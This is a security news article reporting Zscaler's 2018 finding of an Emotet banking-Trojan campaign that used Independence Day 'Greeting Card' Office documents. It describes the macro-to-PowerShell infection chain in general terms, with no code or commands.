Emotet Malware Delivered Via Microsoft Office Documents
A new malware campaign has been detected in which Emotet malware is being delivered using Microsoft Office documents attachments and the documents being named as “Greeting Card”. The hackers who were behind this campaign were using the U.S Independence Day as a mask to trick users into downloading the malicious attachment into their systems/devices.
Cyber experts at the security firm Zscaler were the ones to detect the new malware campaign. A detailed post titled ‘Independence Day greeting campaign delivers Emotet’ on the Zscaler blog and dated July 06, 2018 discusses the malware campaign in detail. The blog post says- “Recently, Zscaler’s research team, ThreatLabZ, came across malicious Microsoft Office documents delivering Emotet malware via attachments using “Greeting Card” as the document name. The malware author leveraged the popular 4th of July holiday, the USA’s Independence Day, to lure users into downloading and opening the malicious documents. We saw over two dozen unique payloads hitting our Cloud Sandbox in the 48-hour span from July 2nd to July 4th earlier this week.”
Emotet, a banking Trojan, was identified for the first time in 2014; hackers use it to steal personal information like usernames, passwords etc.
Here, in the case of the new Emotet campaign, the attached document would contain a tricky social-engineered message that would tempt the users to enable content. Once the user does that the malicious macro would be executed in the background. It needs to be remembered that Microsoft Office, by default, disables automatic execution of macros and would enable it only when the user goes on to select “enable content”. This is followed by the obfuscation of the macro, which helps it evade detection; it triggers wscript.exe to run the whole command. The code executes Wscript to download a payload using the PowerShell script, which is highly obfuscated and hence very difficult to be analyzed by security researchers. Finally, the de-obfuscated PowerShell command parameters would download the Emotet payload, which would be dropped to the temp directory in Windows.
Describing the Emotet payload, the Zscaler blog post says- “Emotet creates a copy of itself in “C:\windows\system32\” with the filename created by appending two strings from a predetermined set of hard-coded strings. The combination of strings is chosen based on “volume serial number” of the infected system’s volume.”
Emotet is now a widely distributed malware, which is now mostly spread using malicious spam campaigns containing office documents. Researchers also point out that every time this malware seems to be emerging with new capabilities. This multi-component malware is capable of stealing credentials from browsers and email, through Man-in-the-Browser attacks and email harvesting.